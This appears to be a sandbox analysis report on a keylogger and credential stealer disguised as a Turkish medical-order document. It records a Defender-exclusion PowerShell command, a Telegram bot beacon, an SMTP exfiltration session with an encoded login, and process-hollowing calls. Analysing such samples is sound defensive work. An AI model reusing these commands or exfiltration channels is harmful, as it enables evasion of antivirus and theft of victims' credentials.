                                                                                                  2024-12-10 15:24:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.649795172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:37 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:37 UTC883INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:37 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23600
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPic5BEV3AMy1amPaEvWlFGZIowy3rCGIqNVYaoTYZe%2F1Ssxw9gJmX1cGyEHcY%2BnPH1dqQ2s92HdAbEnJldBAjjVwAzgekRgn%2Fh5a4l%2FucSpgffyn94%2Bnunr%2BufJ3EFTxSk7PK%2BH"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3e2f2d424291-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1724&rtt_var=662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1634938&cwnd=207&unsent_bytes=0&cid=a8d7807841ad584a&ts=459&x=0"
                                                                                                  2024-12-10 15:24:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.649797149.154.167.2204431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:39 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:36:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:39 UTC344INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Tue, 10 Dec 2024 15:24:39 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 55
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  2024-12-10 15:24:39 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                  SMTP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                  Dec 10, 2024 16:24:48.863353014 CET5874982277.245.159.14192.168.2.6220-stilgar.wlsrv.com ESMTP Exim 4.96.2 #2 Tue, 10 Dec 2024 18:24:48 +0300
                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                  220 and/or bulk e-mail.
                                                                                                  Dec 10, 2024 16:24:48.863569975 CET49822587192.168.2.677.245.159.14EHLO 571345
                                                                                                  Dec 10, 2024 16:24:49.309055090 CET5874982277.245.159.14192.168.2.6250-stilgar.wlsrv.com Hello 571345 [8.46.123.175]
                                                                                                  250-SIZE 52428800
                                                                                                  250-8BITMIME
                                                                                                  250-PIPELINING
                                                                                                  250-PIPECONNECT
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-STARTTLS
                                                                                                  250 HELP
                                                                                                  Dec 10, 2024 16:24:49.310322046 CET49822587192.168.2.677.245.159.14AUTH login YmlsZ2lAYWRlbmRhbmlzbWFubGlrLmNvbS50cg==
                                                                                                  Dec 10, 2024 16:24:49.751543999 CET5874982277.245.159.14192.168.2.6334 UGFzc3dvcmQ6
                                                                                                  Dec 10, 2024 16:24:50.291631937 CET5874982277.245.159.14192.168.2.6235 Authentication succeeded
                                                                                                  Dec 10, 2024 16:24:50.292012930 CET49822587192.168.2.677.245.159.14MAIL FROM:<bilgi@adendanismanlik.com.tr>
                                                                                                  Dec 10, 2024 16:24:50.732841969 CET5874982277.245.159.14192.168.2.6250 OK
                                                                                                  Dec 10, 2024 16:24:50.734371901 CET49822587192.168.2.677.245.159.14RCPT TO:<tiryaki.mehmetdemir@gmail.com>
                                                                                                  Dec 10, 2024 16:24:51.186331987 CET5874982277.245.159.14192.168.2.6550 Outgoing mail from "bilgi@adendanismanlik.com.tr" has been suspended.

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:10:24:06
                                                                                                  Start date:10/12/2024
                                                                                                  Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                  Imagebase:0x4f0000
                                                                                                  File size:869'376 bytes
                                                                                                  MD5 hash:B0FA72F0C9B26ED1AC2DA43DAFCA043D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:10:24:09
                                                                                                  Start date:10/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                  Imagebase:0x770000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:10:24:09
                                                                                                  Start date:10/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:10:24:09
                                                                                                  Start date:10/12/2024
                                                                                                  Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                  Imagebase:0x260000
                                                                                                  File size:869'376 bytes
                                                                                                  MD5 hash:B0FA72F0C9B26ED1AC2DA43DAFCA043D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:10:24:09
                                                                                                  Start date:10/12/2024
                                                                                                  Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                  Imagebase:0x4e0000
                                                                                                  File size:869'376 bytes
                                                                                                  MD5 hash:B0FA72F0C9B26ED1AC2DA43DAFCA043D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.7%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:248
                                                                                                    Total number of Limit Nodes:16
                                                                                                    execution_graph 53095 77463c5 53096 77463cb 53095->53096 53097 77463d6 53096->53097 53102 77476d4 53096->53102 53123 7747698 53096->53123 53144 77476c0 53096->53144 53165 77476d0 53096->53165 53103 77476ea 53102->53103 53104 774770e 53103->53104 53186 7747b8e 53103->53186 53191 774804d 53103->53191 53196 7747bac 53103->53196 53201 774810c 53103->53201 53208 77480e2 53103->53208 53213 774807b 53103->53213 53218 7747c99 53103->53218 53225 7747c33 53103->53225 53232 7747c12 53103->53232 53239 7747e72 53103->53239 53246 77480d2 53103->53246 53251 77483d1 53103->53251 53258 7747cf1 53103->53258 53263 7747d10 53103->53263 53268 7748350 53103->53268 53275 7747d15 53103->53275 53281 7747d2b 53103->53281 53291 7747b29 53103->53291 53104->53097 53124 774769c 53123->53124 53124->53097 53125 77476cc 53124->53125 53126 7747d15 2 API calls 53124->53126 53127 7748350 4 API calls 53124->53127 53128 7747d10 2 API calls 53124->53128 53129 7747cf1 2 API calls 53124->53129 53130 77483d1 4 API calls 53124->53130 53131 77480d2 2 API calls 53124->53131 53132 7747e72 4 API calls 53124->53132 53133 7747c12 4 API calls 53124->53133 53134 7747c33 4 API calls 53124->53134 53135 7747c99 4 API calls 53124->53135 53136 774807b 2 API calls 53124->53136 53137 77480e2 2 API calls 53124->53137 53138 774810c 4 API calls 53124->53138 53139 7747bac 2 API calls 53124->53139 53140 774804d 2 API calls 53124->53140 53141 7747b8e 2 API calls 53124->53141 53142 7747b29 2 API calls 53124->53142 53143 7747d2b 6 API calls 53124->53143 53125->53097 53126->53125 53127->53125 53128->53125 53129->53125 53130->53125 53131->53125 53132->53125 53133->53125 53134->53125 53135->53125 53136->53125 53137->53125 53138->53125 53139->53125 53140->53125 53141->53125 53142->53125 53143->53125 53145 77476c4 53144->53145 53146 77476cc 53145->53146 53147 7747d15 2 API calls 53145->53147 53148 7748350 4 API calls 53145->53148 53149 7747d10 2 API calls 53145->53149 53150 7747cf1 2 API calls 53145->53150 53151 77483d1 4 API calls 53145->53151 53152 77480d2 2 API calls 53145->53152 53153 7747e72 4 API calls 53145->53153 53154 7747c12 4 API calls 53145->53154 53155 7747c33 4 API calls 53145->53155 53156 7747c99 4 API calls 53145->53156 53157 774807b 2 API calls 53145->53157 53158 77480e2 2 API calls 53145->53158 53159 774810c 4 API calls 53145->53159 53160 7747bac 2 API calls 53145->53160 53161 774804d 2 API calls 53145->53161 53162 7747b8e 2 API calls 53145->53162 53163 7747b29 2 API calls 53145->53163 53164 7747d2b 6 API calls 53145->53164 53146->53097 53147->53146 53148->53146 53149->53146 53150->53146 53151->53146 53152->53146 53153->53146 53154->53146 53155->53146 53156->53146 53157->53146 53158->53146 53159->53146 53160->53146 53161->53146 53162->53146 53163->53146 53164->53146 53166 77476d3 53165->53166 53167 7747d15 2 API calls 53166->53167 53168 7748350 4 API calls 53166->53168 53169 7747d10 2 API calls 53166->53169 53170 7747cf1 2 API calls 53166->53170 53171 77483d1 4 API calls 53166->53171 53172 77480d2 2 API calls 53166->53172 53173 7747e72 4 API calls 53166->53173 53174 7747c12 4 API calls 53166->53174 53175 7747c33 4 API calls 53166->53175 53176 7747c99 4 API calls 53166->53176 53177 774807b 2 API calls 53166->53177 53178 77480e2 2 API calls 53166->53178 53179 774810c 4 API calls 53166->53179 53180 7747bac 2 API calls 53166->53180 53181 774804d 2 API calls 53166->53181 53182 7747b8e 2 API calls 53166->53182 53183 7747b29 2 API calls 53166->53183 53184 7747d2b 6 API calls 53166->53184 53185 774770e 53166->53185 53167->53185 53168->53185 53169->53185 53170->53185 53171->53185 53172->53185 53173->53185 53174->53185 53175->53185 53176->53185 53177->53185 53178->53185 53179->53185 53180->53185 53181->53185 53182->53185 53183->53185 53184->53185 53185->53097 53187 7747b2c 53186->53187 53188 7747b0f 53187->53188 53296 7745c94 53187->53296 53300 7745ca0 53187->53300 53188->53104 53192 774808d 53191->53192 53304 7745520 53192->53304 53308 7745519 53192->53308 53193 77480ab 53197 7747b3f 53196->53197 53198 7747b0f 53197->53198 53199 7745c94 CreateProcessA 53197->53199 53200 7745ca0 CreateProcessA 53197->53200 53198->53104 53199->53197 53200->53197 53312 7745440 53201->53312 53316 7745448 53201->53316 53202 774858b 53203 7747d08 53203->53202 53320 77456d0 53203->53320 53324 77456c8 53203->53324 53209 7748105 53208->53209 53328 77455e0 53209->53328 53332 77455d9 53209->53332 53210 77482ea 53214 7748081 53213->53214 53216 7745520 VirtualAllocEx 53214->53216 53217 7745519 VirtualAllocEx 53214->53217 53215 77480ab 53216->53215 53217->53215 53220 7747c9f 53218->53220 53219 77485e6 53219->53104 53220->53219 53221 7745440 Wow64SetThreadContext 53220->53221 53222 7745448 Wow64SetThreadContext 53220->53222 53336 7745390 53220->53336 53340 7745398 53220->53340 53221->53220 53222->53220 53227 7747c40 53225->53227 53226 77485e6 53226->53104 53227->53226 53228 7745440 Wow64SetThreadContext 53227->53228 53229 7745448 Wow64SetThreadContext 53227->53229 53230 7745390 ResumeThread 53227->53230 53231 7745398 ResumeThread 53227->53231 53228->53227 53229->53227 53230->53227 53231->53227 53234 7747c1b 53232->53234 53233 77485e6 53233->53104 53234->53233 53235 7745440 Wow64SetThreadContext 53234->53235 53236 7745448 Wow64SetThreadContext 53234->53236 53237 7745390 ResumeThread 53234->53237 53238 7745398 ResumeThread 53234->53238 53235->53234 53236->53234 53237->53234 53238->53234 53241 7747ca0 53239->53241 53240 77485e6 53240->53104 53241->53240 53242 7745440 Wow64SetThreadContext 53241->53242 53243 7745448 Wow64SetThreadContext 53241->53243 53244 7745390 ResumeThread 53241->53244 53245 7745398 ResumeThread 53241->53245 53242->53241 53243->53241 53244->53241 53245->53241 53247 7747d08 53246->53247 53248 774858b 53247->53248 53249 77456d0 ReadProcessMemory 53247->53249 53250 77456c8 ReadProcessMemory 53247->53250 53249->53247 53250->53247 53252 7747ca0 53251->53252 53253 77485e6 53252->53253 53254 7745440 Wow64SetThreadContext 53252->53254 53255 7745448 Wow64SetThreadContext 53252->53255 53256 7745390 ResumeThread 53252->53256 53257 7745398 ResumeThread 53252->53257 53253->53104 53254->53252 53255->53252 53256->53252 53257->53252 53259 7747cf7 53258->53259 53260 774858b 53259->53260 53261 77456d0 ReadProcessMemory 53259->53261 53262 77456c8 ReadProcessMemory 53259->53262 53261->53259 53262->53259 53264 77484c5 53263->53264 53266 77455e0 WriteProcessMemory 53264->53266 53267 77455d9 WriteProcessMemory 53264->53267 53265 77484e6 53266->53265 53267->53265 53269 7747ca0 53268->53269 53270 77485e6 53269->53270 53271 7745390 ResumeThread 53269->53271 53272 7745398 ResumeThread 53269->53272 53273 7745440 Wow64SetThreadContext 53269->53273 53274 7745448 Wow64SetThreadContext 53269->53274 53270->53104 53271->53269 53272->53269 53273->53269 53274->53269 53276 774837d 53275->53276 53277 774838a 53276->53277 53279 77455e0 WriteProcessMemory 53276->53279 53280 77455d9 WriteProcessMemory 53276->53280 53277->53104 53278 77484e6 53279->53278 53280->53278 53282 7747d34 53281->53282 53284 7747c1b 53282->53284 53285 77455e0 WriteProcessMemory 53282->53285 53286 77455d9 WriteProcessMemory 53282->53286 53283 77485e6 53283->53104 53284->53283 53287 7745390 ResumeThread 53284->53287 53288 7745398 ResumeThread 53284->53288 53289 7745440 Wow64SetThreadContext 53284->53289 53290 7745448 Wow64SetThreadContext 53284->53290 53285->53284 53286->53284 53287->53284 53288->53284 53289->53284 53290->53284 53292 7747b36 53291->53292 53293 7747b0f 53292->53293 53294 7745c94 CreateProcessA 53292->53294 53295 7745ca0 CreateProcessA 53292->53295 53293->53104 53294->53292 53295->53292 53297 7745c98 CreateProcessA 53296->53297 53299 7745eeb 53297->53299 53301 7745ca3 CreateProcessA 53300->53301 53303 7745eeb 53301->53303 53305 7745523 VirtualAllocEx 53304->53305 53307 774559d 53305->53307 53307->53193 53309 774551c VirtualAllocEx 53308->53309 53311 774559d 53309->53311 53311->53193 53313 7745444 Wow64SetThreadContext 53312->53313 53315 77454d5 53313->53315 53315->53203 53317 774544b Wow64SetThreadContext 53316->53317 53319 77454d5 53317->53319 53319->53203 53321 77456d3 ReadProcessMemory 53320->53321 53323 774575f 53321->53323 53323->53203 53325 77456cc ReadProcessMemory 53324->53325 53327 774575f 53325->53327 53327->53203 53329 77455e3 WriteProcessMemory 53328->53329 53331 774567f 53329->53331 53331->53210 53333 77455dc WriteProcessMemory 53332->53333 53335 774567f 53333->53335 53335->53210 53337 7745395 ResumeThread 53336->53337 53339 7745409 53337->53339 53339->53220 53341 774539f ResumeThread 53340->53341 53343 7745409 53341->53343 53343->53220 53356 f1d580 53357 f1d5c6 53356->53357 53361 f1d75a 53357->53361 53364 f1d760 53357->53364 53358 f1d6b3 53362 f1d78e 53361->53362 53367 f1d090 53361->53367 53362->53358 53365 f1d090 DuplicateHandle 53364->53365 53366 f1d78e 53365->53366 53366->53358 53368 f1d7c8 DuplicateHandle 53367->53368 53369 f1d85e 53368->53369 53369->53362 53062 75c77c8 53063 75c77e0 53062->53063 53064 75c786d 53063->53064 53066 7748a27 53063->53066 53069 7748a34 53066->53069 53067 7748a3a 53067->53064 53069->53067 53070 77426c4 53069->53070 53071 7748ce0 PostMessageW 53070->53071 53073 7748d4c 53071->53073 53073->53069 53074 f14668 53075 f1467a 53074->53075 53076 f14686 53075->53076 53078 f14778 53075->53078 53079 f1479d 53078->53079 53083 f14888 53079->53083 53087 f14878 53079->53087 53085 f148af 53083->53085 53084 f1498c 53084->53084 53085->53084 53091 f144b4 53085->53091 53088 f148af 53087->53088 53089 f1498c 53088->53089 53090 f144b4 CreateActCtxA 53088->53090 53089->53089 53090->53089 53092 f15918 CreateActCtxA 53091->53092 53094 f159db 53092->53094 53348 f1b218 53351 f1b300 53348->53351 53349 f1b227 53352 f1b344 53351->53352 53353 f1b321 53351->53353 53352->53349 53353->53352 53354 f1b548 GetModuleHandleW 53353->53354 53355 f1b575 53354->53355 53355->53349 53344 5f2efc8 53345 5f2f016 DrawTextExW 53344->53345 53347 5f2f06e 53345->53347

                                                                                                    Executed Functions

                                                                                                    Function 07424117 Relevance: 2.6, Instructions: 2609COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aa69ee51a638a309f7c1f8649abe6f74aeb1ded4ecbc458ac739dae3413bae71
                                                                                                    • Instruction ID: 2927db9c51eba83247497cf91033a1c658696cf80e8537f74ec4f84faa8d2439
                                                                                                    • Opcode Fuzzy Hash: aa69ee51a638a309f7c1f8649abe6f74aeb1ded4ecbc458ac739dae3413bae71
                                                                                                    • Instruction Fuzzy Hash: C5431CB4A01229CFDB14DF68C888A9DBBB2FF89310F558595D409AB361CB31ED92DF41
                                                                                                    Function 07421240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 769 7421240-7421271 770 7421273 769->770 771 7421278-742133d 769->771 770->771 777 742138b-742139c 771->777 778 742139e-7421406 777->778 779 742133f-7421377 777->779 787 7421c60-7421c8b 778->787 782 7421379 779->782 783 742137e-7421388 779->783 782->783 783->777 789 7421cb8-7421cba 787->789 790 7421c8d-7421cb6 787->790 791 7421cc0-7421cd4 789->791 790->791 793 7421cda-7421ce1 791->793 794 742140b-7421412 791->794 795 7421464-742149f 794->795 797 7421414-742142a 795->797 798 74214a5-74214ae 795->798 800 7421431-742144f 797->800 801 742142c 797->801 799 74214b1-74214e5 798->799 805 74214e7-7421501 799->805 806 7421504-742152b 799->806 802 7421451 800->802 803 7421456-7421461 800->803 801->800 802->803 803->795 805->806 809 7421558 806->809 810 742152d-7421556 806->810 811 7421562-7421570 809->811 810->811 813 7421660-742170d 811->813 814 7421576-742157d 811->814 838 7421713-7421715 813->838 839 742170f 813->839 815 7421643-7421654 814->815 816 7421582-7421598 815->816 817 742165a-742165b 815->817 819 742159a 816->819 820 742159f-74215fd 816->820 821 7421c07-7421c42 817->821 819->820 832 7421604-7421629 820->832 833 74215ff 820->833 821->799 825 7421c48-7421c5f 821->825 825->787 836 742162b-7421637 832->836 837 742163f-7421640 832->837 833->832 836->837 837->815 842 742171c-7421723 838->842 840 7421711 839->840 841 7421717 839->841 840->838 841->842 843 7421731-7421762 842->843 844 7421725-742172e 842->844 846 74217b5-74217f0 843->846 844->843 848 74217f6-7421809 846->848 849 7421764-7421779 846->849 855 7421811-7421831 848->855 856 742180b-74219b2 848->856 851 7421780-742179e 849->851 852 742177b 849->852 853 74217a0 851->853 854 74217a5-74217b2 851->854 852->851 853->854 854->846 863 742183a-74218fd 855->863 859 74219b4-74219b5 856->859 860 74219ba-7421a59 856->860 861 7421bc2-7421bef 859->861 880 7421a60-7421a92 860->880 881 7421a5b 860->881 867 7421bf1-7421c05 861->867 868 7421c06 861->868 878 7421904-7421917 863->878 879 74218ff 863->879 867->868 868->821 882 7421919 878->882 883 742191e-742192b 878->883 879->878 887 7421a94 880->887 888 7421a99-7421acb 880->888 881->880 882->883 884 7421932-7421956 883->884 885 742192d 883->885 891 7421958 884->891 892 742195d-7421977 884->892 885->884 887->888 893 7421ad2-7421b2f 888->893 894 7421acd 888->894 891->892 895 74219a2-74219a3 892->895 896 7421979-7421998 892->896 901 7421b81-7421ba3 893->901 902 7421b31-7421b7b 893->902 894->893 895->861 897 742199a 896->897 898 742199f 896->898 897->898 898->895 906 7421bad-7421bc0 901->906 902->901 906->861
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: 6603dd6fbbe7e241cdd68b62b28be6c2a7efe7f87c1cd123dbe9369d12269fd8
                                                                                                    • Instruction ID: 535b44c22c8527f567be573b68572a5587beef53ac053b9ce48e440af9b9ff33
                                                                                                    • Opcode Fuzzy Hash: 6603dd6fbbe7e241cdd68b62b28be6c2a7efe7f87c1cd123dbe9369d12269fd8
